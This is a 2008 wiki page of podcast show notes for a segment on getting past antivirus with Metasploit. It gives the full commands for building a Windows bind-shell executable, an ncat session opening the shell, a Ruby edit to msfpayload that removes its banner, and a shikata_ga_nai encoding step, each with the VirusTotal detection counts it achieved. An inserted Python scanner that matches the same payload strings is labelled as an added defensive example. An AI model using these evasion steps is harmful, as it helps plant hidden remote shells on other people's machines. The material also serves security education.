Difference between revisions of "Episode125"

From Security Weekly Wiki
Revision as of 18:39, 29 September 2008

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit 3.1-release Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

The above command produces a Windows binary that listens on TCP port 6453 and serves a remote command shell. You can access the remote shell using netcat (here, ncat) as follows:

funnyhostname:~ pdc$ ncat 192.168.169.40 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:

"Reverse Engineering The Payload"

bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

Editing msfpayload to change the banner string. Note that only the first line of the note changes; the "Payload:", "Length:" and "Options:" lines are still written into the binary:

if (cmd =~ /^x/)
  # Stock banner "Created by msfpayload (http://www.metasploit.com)." replaced
  # with a custom one; the remaining lines of the note are left as they were.
  note =
    "PaulDotCom's Evil Payload\n" +
    "Payload: " + payload.refname + "\n" +
    " Length: " + buf.length.to_s + "\n" +
    "Options: " + options + "\n"
  # remainder of the branch unchanged
end

The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).
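To make the detection side of the last two passes concrete, here is a small string-signature scanner (added example, not code from the episode or from the Metasploit project). It reimplements the "strings" check from pass #1 as a few regular expressions and runs them over two constructed byte blobs that stand in for payload.exe from pass #1 and the re-bannered binary from pass #2 (plus a third blob carrying none of the markers). The sample bytes, the marker names and the verdict labels are my own assumptions; the marker texts themselves are the ones visible in the strings output above. The point it shows: a signature keyed on the banner alone goes quiet after pass #2, but the "Payload:" and "Options:" lines the edited note still emits would keep a slightly broader signature firing, and once a build carries none of these strings (as an encoder or a stripped template could produce) this kind of detection has nothing left to match.

```python
import re
from typing import Dict, List

# Constructed stand-ins for the binaries; not real executables, only the
# embedded strings matter for a string-based signature.
SAMPLE_PASS1 = (
    b"MZ\x90\x00" + b"\x00" * 20
    + b"!This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 8 + b".text\x00\x00.rdata\x00@.data\x00.bss\x00.idata\x00"
    + b"\x00" * 8
    + b"Created by msfpayload (http://www.metasploit.com).\n"
    + b"Payload: windows/shell_bind_tcp\n Length: 317\nOptions: LPORT=6453\n"
    + b"\x00" * 16
)

# Pass #2: same bytes, banner line swapped as in the msfpayload edit above.
SAMPLE_PASS2 = SAMPLE_PASS1.replace(
    b"Created by msfpayload (http://www.metasploit.com).",
    b"PaulDotCom's Evil Payload",
)

# A build that carries none of the tell-tale strings (constructed).
SAMPLE_STRIPPED = (
    b"MZ\x90\x00" + b"\x00" * 20
    + b"!This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 8 + b".text\x00" + b"\x00" * 32
)

# Marker patterns (assumed names). The banner is the line Panda apparently
# keyed on; the other two are the option lines msfpayload writes next to it.
MARKERS = {
    "msfpayload_banner": re.compile(
        rb"Created by msfpayload \(http://www\.metasploit\.com\)\."),
    "msf_payload_name": re.compile(
        rb"Payload: (windows|linux|osx)/[A-Za-z0-9_/]+"),
    "msf_options_line": re.compile(rb"Options: LPORT=\d+"),
}


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Minimal equivalent of `strings`: runs of >= min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def scan(data: bytes) -> Dict[str, List[str]]:
    """Return {marker_name: [matched text, ...]} for every marker present."""
    hits: Dict[str, List[str]] = {}
    for name, pattern in MARKERS.items():
        found = [m.group().decode("ascii", "replace") for m in pattern.finditer(data)]
        if found:
            hits[name] = found
    return hits


def verdict(data: bytes) -> str:
    """Three-level verdict: banner present, only option lines present, or nothing."""
    hits = scan(data)
    if "msfpayload_banner" in hits:
        return "flag:msfpayload-banner"
    if hits:
        return "suspicious:msf-option-strings"
    return "clean"


if __name__ == "__main__":
    for label, blob in (("pass1", SAMPLE_PASS1), ("pass2", SAMPLE_PASS2),
                        ("stripped", SAMPLE_STRIPPED)):
        print(label, verdict(blob), scan(blob))
```

Running it prints a verdict per sample: the pass #1 blob trips the banner rule, the pass #2 blob no longer does but still matches on "Payload: windows/shell_bind_tcp" and "Options: LPORT=6453", and the stripped blob matches nothing. That last case is the real lesson of this segment for defenders: signatures on cosmetic strings are cheap to write and just as cheap to defeat, so they belong alongside behavioural checks (a fresh process opening a listening socket, for instance), not in place of them.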

Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe

The payload generated above, when uploaded to Virus Total, is detected by only 4 out of 36 anti-virus engines. It did not function in my testing, but it does show how we can evade anti-virus systems.